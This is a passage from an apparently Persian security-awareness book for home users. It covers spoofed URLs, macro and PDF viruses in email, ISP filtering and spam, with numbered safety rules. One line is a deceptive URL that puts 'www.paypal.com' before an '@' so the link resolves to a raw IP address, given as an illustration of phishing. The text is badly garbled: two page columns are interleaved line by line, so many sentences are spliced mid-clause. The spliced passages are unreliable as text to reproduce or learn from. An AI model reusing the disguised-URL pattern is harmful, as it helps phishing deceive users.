ﺩﻗﻴﻘﹰﺎ ﻫﻤﺎﻥ ﺁﺩﺭﺱ ﺑﺎﺷﺪ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺻـﻔﺤﻪ
ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ URL ،ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ
ﺁﻥ ﺻﻔﺤﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ URL .ﻭﺍﻗﻌﻲ ﻛﻪ ﺑﻪ
ﻻ ﭘﻨﻬﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺼﻮﺭﺕ ﺁﻥ ﺍﺷﺎﺭﻩ ﺷﺪ ﻣﻌﻤﻮ ﹰ
ﺯﻳﺮ ﺑﺎﺷﺪ:
http://www.paypal.com:user=3245329:transaction
=43293:code=4333033.33@218.5.79.162
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺳﻴﺮ ﺗﻜﺎﻣﻞ
ﺍﮔﺮ ﺗﺎﺭﻳﺨﭽﺔ ﺷـﺒﻜﻪ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ) ۱۰ﺗـﺎ ۳۰ﺳـﺎﻝ ﮔﺬﺷـﺘﻪ(
ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ
ﻓﺼﻞ ﺷﺸﻢ
ﺍﺭﺳﺎﻝ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺘﻨﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ .ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ
ﺑﺨﺶ ﺩﻭﻡ
ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﻣﺜـﻞ Microsoft Word ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ؟
)ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ( ﻭ ) Microsoft Excelﺻﻔﺤﻪ ﮔـﺴﺘﺮﺩﺓ ﺩﺍﺩﻩ( ﻭ
ﺗﻤﺎﻣﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣـﺸﺎﺑﻪ ،ﺩﺍﺭﺍﻱ ﻗﺎﺑﻠﻴـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ Macro
ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﺪ .ﺣﺘﻲ ﻓﺎﻳﻠﻬﺎﻱ PDF
ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ )ﺍﮔﺮﭼﻪ ﺍﻳـﻦ
66 Header
٨١ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻗﺎﻧﻮﻥ ﺩﻫﻢ: ﻓﺎﻳﻠﻬﺎ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﻧـﺎﻙ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ
Adobe Acrobat Professionalﺑــﺎﺯ ﺷــﻮﻧﺪ ﻭ ﺑــﺎﺯﻛﺮﺩﻥ ﺁﻧﻬــﺎ ﺑــﺎ
ﺍﺯ ISPﺧﻮﺩ ﺳـﺆﺍﻝ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺭﺳـﺎﻝ
ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﭼﻮﻥ Adobe Acrobat Readerﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺑﻴﺸﺘﺮﻱ ﻣﻴـﺎﻥ
ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺩﺍﺷﺘﻦ ﻭﻳﺮﻭﺱ ﺍﻓﺮﺍﺩ ﺩﺍﺭﺩ ﺧﻄﺮ ﺧﺎﺻﻲ ﺩﺭ ﭘﻲ ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ( .ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻫﻨﻤـﺎﻱ
ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ. ﻛﺎﺭﺑﺮﻱ ﻭ ﻳﺎ ﺻﻔﺤﺎﺕ ﺭﺍﻫﻨﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﭼﮕﻮﻧﻪ
ﺑﻪ ﺩﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻌﺎﻟﻴـﺖ ﻛﺮﻣﻬـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﺍﻛﺜـﺮ ﻣﻲﺗﻮﺍﻥ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎ )ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻨـﺪﺭﺕ ﻣـﻮﺭﺩ
ISPﻫﺎ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻧﺒﺎﻳـﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ( ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ.
ﺗﻮﻗﻊ ﺩﺍﺷﺖ ﻛﻪ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ISPﺷﻤﺎ ﺻﺪ ﺩﺭﺻـﺪ ﺛﻤـﺮﺑﺨﺶ
ﺑﺨﺶ ﺩﻭﻡ
ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ISPﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ ﺗﻼﺷـﻬﺎﻱ ﻗﺎﻧﻮﻥ ﻫﺸﺘﻢ:
ﺷﻤﺎ ﺩﺭ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻛﻨﺪ .ﺍﮔﺮ ISPﺷـﻤﺎ ﺍﺯ ﻣـﺴﺎﺋﻞ ﻫﺮﮔﺰ ﺿﻤﺎﺋﻢ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﺟﺎﻧﺐ ﺍﻓﺮﺍﺩ ﺷﻨﺎﺧﺘﻪﺷـﺪﻩ ﻭ
ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻩ ﻧﻴﺴﺖ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧـﺪﻣﺎﺕ ﺍﻣـﻦﺗـﺮ ﺑـﻪ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻧﻴﺰ ﺑﺎﺯ ﻧﻜﻨﻴﺪ؛ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺍﻃﻤﻴﻨـﺎﻥ
ﻼ
ﺧﻮﺩﺗﺎﻥ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺎ ﺁﻧﻬـﺎ ﻫﻤﻜـﺎﺭﻱ ﻛﻨﻴـﺪ .ﻣـﺜ ﹰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻓـﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺍﻳـﻦ ﺿـﻤﺎﺋﻢ ﺭﺍ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﺘﺎﺑﻲ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﻣـﺸﻐﻮﻝ ﻣﻄﺎﻟﻌـﻪ ﺑﺮﺭﺳﻲ ﻛﺮﺩﻩ ﻭ ﺑﺎ ﻣﻼﺣﻈـﻪ ﻛﺎﻣـﻞ ﺑﺮﺍﻳﺘـﺎﻥ ﺍﺭﺳـﺎﻝ
ﺁﻥ ﻫﺴﺘﻴﺪ ﺭﺍ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻫﺪﻳﻪ ﻧﻤﺎﻳﻴﺪ! ﻧﻤﻮﺩﻩ ﺍﺳﺖ.
ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻴﻦ ﺩﻭﺳﺖ ﺷﻤﺎ ﻭﻳﺮﻭﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ
ﻫﺮﺯﻧﺎﻣﻪ
ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ ﻫﻤـﺔ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ
ﻫﺮﺯﻧﺎﻣﻪ ٦٩ﻧﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻭﻱ ﻫﺴﺘﻨﺪ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﺪ.
ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ،ﺧﺼﻮﺻﹰﺎ ﻧﺎﻣﻪﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺍﺯ ﻃـﺮﻑ ﺍﻓـﺮﺍﺩ
ﻻ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﻛـﻪ ﻧﺎﺷﻨﺎﺱ ﻭ ﺑﺼﻮﺭﺕ ﻣﺘﻌﺪﺩ -ﺍﺣﺘﻤﺎ ﹰ ﻗﺎﻧﻮﻥ ﻧﻬﻢ:
ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪﻩ ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﺁﻧﻬـﺎ ﻋﻼﻗـﻪﻣﻨـﺪ ﺧﻮﺍﻫـﺪ ﺷـﺪ - ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ
ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﻧﺪ .ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺗﻌـﺪﺍﺩ ﻫﺮﺯﻧﺎﻣـﻪ ﻫـﺎ ﺑﻄـﻮﺭ ﻛﻨﻴﺪ ﺗﺎ ﻓﺎﻳﻠﻬﺎﻱ HTMLﺗﻔﻨﻨﻲ ٦٧ﺭﺍ ﭘﺮﺩﺍﺯﺵ ﻧﻜﻨﺪ ﻭ
ﭼﺸﻤﮕﻴﺮﻱ ﺍﻓﺰﺍﻳﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺩﺭ ﺳﺎﻝ ۲۰۰۳ﺑـﻴﺶ ﺍﺯ %۵۰ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟﻮﺩﻩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ.
ﺍﺯ ﻛﻞ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺒﺎﺩﻝﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻫﺮﺯﻧﺎﻣـﻪ
ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺰﺋﻴﻨﻲ
ﺑﻮﺩﻩ ﺍﺳﺖ! ﺑﺴﻴﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻫﻢ ﺍﻛﻨﻮﻥ ﺑﻪ ﺍﺯﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻫـﺮ ﻳـﻚ
ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ،ﻭﻟﻲ ﺩﺭ ﻋﻮﺽ ﻛﻨﺘﺮﻝ
ﻧﺎﻣﺔ ﻣﻌﺘﺒﺮ ﺣﺪﻭﺩ ۱۰ﻫﺮﺯﻧﺎﻣﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ.
ﺑﻬﺘﺮﻱ ﺭﻭﻱ ﻋﻤﻠﻜﺮﺩ ﺑﺮﻧﺎﻣﺔ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺧـﻮﺩ ﺑﺪﺳـﺖ
ﺍﮔــﺮ ﺩﺭ ﻓﻴﻠــﺪ "ﻣﻮﺿــﻮﻉ" ﻫﺮﺯﻧﺎﻣــﻪﻫــﺎ ﻋﺒﺎﺭﺗﻬــﺎﻳﻲ ﻧﻈﻴــﺮ ﺁﻭﺭﻳﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺧـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﭘـﺴﺖ
"** "**SPAMﻭﺟﻮﺩ ﻣﻲﺩﺍﺷﺖ ،ﺁﻧﮕﺎﻩ ﻣﻲ ﺗﻮﺍﻧﺴﺘﻴﻢ ﺑﻪ ﺁﺳـﺎﻧﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛـﺪ HTMLﺣﺘـﻲ ﻻﺯﻡ ﻧﻴـﺴﺖ
ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻴﻢ .ﻗﻮﺍﻧﻴﻦ ﻣﺼﻮﺏ ﻗﻀﺎﻳﻲ ﺣﻜﻢ ﻣﻲﻛﻨﺪ ﭘﻴﺎﻣﻲ ﻛﻪ ﺣﺎﻭﻱ ﻛﺪ HTMLﺍﺳﺖ ﺭﺍ ﺑﺎﺯ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑـﻪ ﻧﻤـﺎﻳﺶ
ﻛﻪ ﻫﺮ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻛـﻪ ﺍﺯ ﺳـﻮﻱ ﺷـﺮﻛﺘﻬﺎﻱ ﺩﺭ ﺁﻣﺪﻥ ﺁﻥ ﭘﻴﺎﻡ ﺩﺭ ﺻﻔﺤﺔ ﭘﻴﺶﻧﻤﺎﻳﺶ ٦٨ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛﺪ
ﺗﺠﺎﺭﻱ ﺍﺭﺳﺎﻝ ﺷﻮﺩ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﻛﺎﻓﻲ ﺍﺳﺖ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺎﻭﻱ
ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭﺳـﻴﻊ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﻭ ﻧﻴـﺰ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﻣﺤـﺪﻭﺩ ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ HTMLﺑﺎﺷـﺪ ﺍﻣـﺎ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﻭ
ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﻪ ﺷــﻤﺎ ﺍﺟــﺎﺯﻩ ﻣــﻲﺩﻫﻨــﺪ
ﻋﻤﻠﻲ ﻧﻴﺴﺖ .ﻫﺮﻛﺲ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻭ ﻳـﺎ ﺍﺭﺳـﺎﻝ ،Javascript ،cookieﻭ plug-inﺻــﻔﺤﺎﺗﻲ ﻛــﻪ ﺑﻌﻨــﻮﺍﻥ
ﺍﺧﻄﺎﺭ ﺑﻪ ﻳﻚ ﺳﻴـﺴﺘ ﹺﻢ ﺷـﻠﻮ ﹺﻍ ﺩﺭﻳﺎﻓـﺖ ﺷـﻜﺎﻳﺖ ،ﻳـﻚ ﺭﻭﺵ ﺑﺨﺸﻲ ﺍﺯ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ
ﻣﻨﻄﻘﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻭ ﺣﺬﻑ ﺁﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ. ﻧﻤﺎﻳﻴﺪ.
ﻳﻚ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ٧٣ﺑﺮﺍﻱ ﺧﻮﺩ ﺛﺒﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ • ﺁﺷﻨﺎﻳﻲ ﺑﻴﺸﺘﺮ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ
ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﮔﺮﻭﻩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻳﻚ ﭘﺎﻳﮕﺎﻩ
ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺩﺭ ﭘـﻲ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ ﺳـﻪ
ﻭﺏ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ.
ﻧﻜﺘﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ:
ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ﭘـﺴﺘﻲ ﻗﺎﺑـﻞ ﺣـﺪﺱ ﺯﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ •
ﺍﻟﻒ( ﭼﮕﻮﻧﻪ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ.
ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ.
ﺏ( ﭼﻪ ﭼﻴﺰﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ )ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺩﻗﻴﻖ(.
ﻼ
ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻜﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻗﺒ ﹰ • ﺝ( ﭼﺮﺍ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ ،ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ.
ﺑﻪ ﺁﻧﻬﺎ ﻧﻔﻮﺫ ﺷﺪﻩ ﺍﺳﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ.
ﺍﮔﺮ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ ﺻـﺪﻕ ﻛﻨـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﻟــﻒ( ﺍﮔــﺮ ﻳﻜــﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬــﺎﻱ ﺯﻳــﺮ ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﺍﺩﻩ ﺑﺎﺷــﻴﺪ
ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺁﺩﺭﺱ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﻣﻮﻗﻌﻴﺖ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ ﺁﺩﺭﺱ ﺷـﻤﺎ ﺭﺍ
ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ﻭ ﻳﺎ ﺣﺘﻲ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﻭﺧﺘﻪ ﺷـﻮﺩ .ﺑـﻪ ﺩﺍﺭﻧﺪ:
ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔﺮ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺍﻳـﻦ ﻧﺎﻣﻪ ﻳﺎ ﺍﻣﻀﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﻳـﻚ ﻓﻬﺮﺳـﺖ ﺁﺩﺭﺱ •
ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﻋﻤﻮﻣﻲ ٧٠ﺍﺭﺳﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ.
ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ.
ﻼ ﺧﻮﺍﺳـﺘﻪ
ﺑﻪ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻣـﺜ ﹰ •
ﺏ( ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﻪ ﺩﻟﻴﻞ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﻭ ﻧﺎﻣﺮﺑﻮﻁ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﺯ ﻓﻬﺮﺳـﺖ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﮔﺎﻥ ﺣـﺬﻑ
ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﻪ ﻣﻲﺩﺍﻧﻨﺪ ﻛـﻪ ﺑﻮﺩﻧﺸﺎﻥ ﻛﺎﻣ ﹰ ﺷﻮﻳﺪ.
ﻫﺮﺯﻧﺎﻣﻪ ﻣﻲﺑﺎﺷﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ ﺑﻌﻀﻲ ﻧﺎﻣﻪﻫﺎﻱ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﺑﺮﺍﻱ ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ ٧١ﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﻴﺪ. •
ﻣﺴﺌﻠﻪ ﻛﻤﺘﺮ ﺁﺷﻜﺎﺭ ﺍﺳﺖ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ
ﺑﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳـﺎﻓﺘﻲ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺩﺭ ﻳـﻚ ﻓـﺮﻡ ﻭﺏ ﺛﺒـﺖ ﻧـﺎﻡ ﻛـﺮﺩﻩ •
ﺭﺍ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺪﺍﻧﺪ ﻳﺎ ﺧﻴﺮ .ﻣﺜﺎﻟﻬﺎﻱ ﺯﻳﺮ ﺑـﻪ ﺭﻭﺷـﻦ ﺷـﺪﻥ ﺑﺎﺷﻴﺪ ﻭ ﺁﺩﺭﺱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻥ ﻭﺍﺭﺩ ﻧﻤـﻮﺩﻩ ﺑﺎﺷـﻴﺪ
ﺑﻴﺸﺘﺮ ﻣﻮﺿﻮﻉ ﻛﻤﻚ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ: )ﺣﺘﻲ ﺍﮔﺮ ﻛﺎﻣ ﹰ
ﻼ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻣﻌﺘﺒـﺮﻱ
ﻣﺮﺍﺟﻌﻪ ﻧﻤﻮﺩﻩﺍﻳﺪ(.
